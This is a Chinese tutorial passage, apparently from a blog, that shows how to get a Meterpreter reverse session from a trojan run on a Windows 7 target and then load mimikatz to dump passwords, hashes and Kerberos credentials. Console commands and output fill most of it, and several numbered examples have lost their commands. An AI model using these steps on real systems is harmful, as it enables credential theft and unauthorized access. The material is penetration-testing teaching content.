mimikatz工具简介

mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架中,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工具恢复密码。
windows2012以下的系统给可直接获取到明文,2012以上的系统只能获取到hash值。

实例演示

(1)通过在目标主机(Windows 7)上运行kali创建的可执行文件木马程序backup.exe,获取一个远程会话。如下所示:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 192.168.6.110
[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.110:1523) at 2014-07-19 16:54:18 +0800
meterpreter >

从输出的信息中,可以看到获取到了一个与目标靶机的远程会话。

(2)确认目标用户的权限。执行命令如下所示:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

tips:注意,运行此工具执行命令需要管理员权限,所以我个人建议在内网渗透中首先应该进行提权,再进行后续操作。

从输出信息中,可以看到当前用户已经是系统权限。此时,就可以进行其他操作了。

(3)加载mimikatz模块。执行命令如下所示:

meterpreter > load mimikatz
Loading extension mimikatz…success.

从输出的信息中,可以看到mimikatz模块已加载成功。

(4)查看mimikatz模块下有效的命令。执行命令如下所示:

meterpreter > help

执行以上命令后,会输出大量的信息。其中,在Meterpreter中所有的命令都已分类。这里主要介绍下mimikatz相关的命令,如下所示:

Mimikatz Commands
=================Command    Description-------    -----------kerberos   Attempt to retrieve kerberos credslivessp    Attempt to retrieve livessp credsmimikatz_command  Run a custom commanndmsv        Attempt to retrieve msv creds (hashes)ssp        Attempt to retrieve ssp credstspkg      Attempt to retrieve tspkg credswdigest    Attempt to retrieve wdigest creds

这里help对此工具模块列出了所有命令,大家可以进行翻译查看提示选择对应的命令进行后续操纵。

以上输出信息显示了可执行的Mimikatz命令。如回复kerberos信息、livessp信息和哈希信息等。

【实例8-4】恢复哈希密码。执行命令如下所示:

执行以上命令后,输出五列信息。分别表示认证ID、包、域名、用户名和密码。从该界面可以看到,当前系统中bob用户的哈希密码值中。在哈希密码值中,前面的lm表示使用LM方式加密;ntlm表示使用NTLM方式加密。

【实例8-5】获取kerberos(网络认证协议)信息。执行命令如下所示:

以上输出的信息就是当前用户摘要式身份验证的信息。

【实例8-7】恢复livessp身份验证信息。执行命令如下所示:


以上输出的信息显示了当前用户livessp身份验证信息。

总结

此工具在内网渗透中用处非常大,各位看官用到的可以观赏此文,喜欢请您点个关注点个赞,给予我不竭的动力,继续努力!成为中国网安力量的一员。

Kali破解windows系统用户名密码工具mimikatz相关推荐

  1. 使用Hashcat破解Windows系统账号密码

    使用Hashcat破解Windows系统账号密码 Simeon 笔者最近对oclHashcat工具破解密码进行了研究,偶有所得,因此撰文跟大家一起分享,本次破解对象选择破解Windows7用户密码.o ...

  2. 【CyberSecurityLearning 3】批处理、用户与组管理、服务器远程管理、破解Windows系统密码

    目录 一.批处理编写 1.1.批处理作用 1.2.如何创建批处理 1.3.批处理基本语法 1.3.1.@echo off 1.3.2.pause 1.3.3.title 1.3.4.echo. 1.3 ...

  3. 二 PE破解windows系统密码

    这里写目录标题 window7及window10 破解方式 第一步 第二步 第三步 第四步 第五步 最后一步 总结 本期,是 黑客学好好,牢饭香喷喷合集的第二篇 这期的目的与上次类似,也是破解wind ...

  4. 1.2物理接触获取并破解windows系统密码

    1.2物理接触获取并破解windows系统密码 很多人认为个人计算机比较安全,因为给计算机设置了密码,外人不知道设置的密码,因此也就安全了,其实这里面很很大的误解,个人计算机安全除了设置密码强健程度以 ...

  5. 破解Visra系统登录密码

    微软苦心"打磨"了五年的操作系统,一再宣称是"史上最安全"的Windows Vista竟然是如此的脆弱,系统登录密码竟然是形同虚设!不论是谁,只要拥有一张Vis ...

  6. windows系统-web渗透工具-AWVS

    windows系统-web渗透工具-AWVS ACUNETIX WEB VULNERABILITY SCANNER(AWVS) Awvs是一款很出名的web安全扫描器,属于windows系统平台下最流 ...

  7. Windows系统封装初始化工具sysprep

    Windows系统封装初始化工具sysprep Sysprep简介 Sysprep程序是微软公司用来配置Microsoft Windows全新安装的一个工具,是为方便企业用户部署系统而设计的. Sys ...

  8. 用 Kali 实现爆破获取用户名密码

    确定Kali连上了网 进入选项-设置,修改代理 preferen–setting 然后打开burpsuite 设置代理 按步骤设置代理地址端口,和浏览器设置一样 然后在浏览器里面输入搭建好的服务器地址 ...

  9. 华为服务器windows系统密码,华为云windows系统默认密码

    华为云windows系统默认密码 内容精选 换一换 华为云帮助中心,为用户提供产品简介.价格说明.购买指南.用户指南.API参考.最佳实践.常见问题.视频帮助等技术文档,帮助您快速上手使用华为云服务. ...

最新文章

  1. 玩转JavaScript正则表达式
  2. ffmpeg: error while loading shared libraries: libavdevice.so.52
  3. 谷歌的量子计算机速度,谷歌称其量子计算机速度比传统计算机快1亿倍
  4. ECharts 浙江地图实践
  5. SQL Server删除整个数据库中表数据的方法(不影响表结构)
  6. Systemd管理示例
  7. java中return提醒不兼容的_JAVA报return为不兼容类型
  8. 2021年中国直播电商投融资情况及行业发展中存在的问题、发展趋势和对策分析[图]
  9. 如何防止sql注入?防止sql注入方法介绍
  10. 教你快速设计正交试验及试验数据分析
  11. 1周前,一个对外挂一无所知的人,在的成长过程(经典推荐)
  12. gradle报错this sometimes occurs after a network connection timeout.解决
  13. Uniformly Distributed
  14. QQ透明头像通用设置教程!不仅简单而且免费!
  15. 生成时间序列每月月初月末
  16. 面向资源受限安全芯片的开放式运行环境设计
  17. LaTeX代码: 表格 ← 利用 tabular
  18. sql joins图示
  19. .net仿google analysis第三方流量监测
  20. 奶爸日记4 - 海边看轮船玩滑梯

热门文章

  1. 基于MATLAB的水果品质检测方法的研究
  2. VESA 标准查看工具
  3. HTML标签重点总结+案例
  4. Thymeleaf常用语法:模板片断
  5. 杭州星滔企业管理公司成立 马云持股
  6. 1000w的数据表,18s执行的SQL优化到0.22s?
  7. 进行渗透测试的详细检测方法
  8. DLT645通信规约DTU 智能远程抄表
  9. 工程伦理课后习题答案
  10. 机械-传动结构-减速机-谐波减速机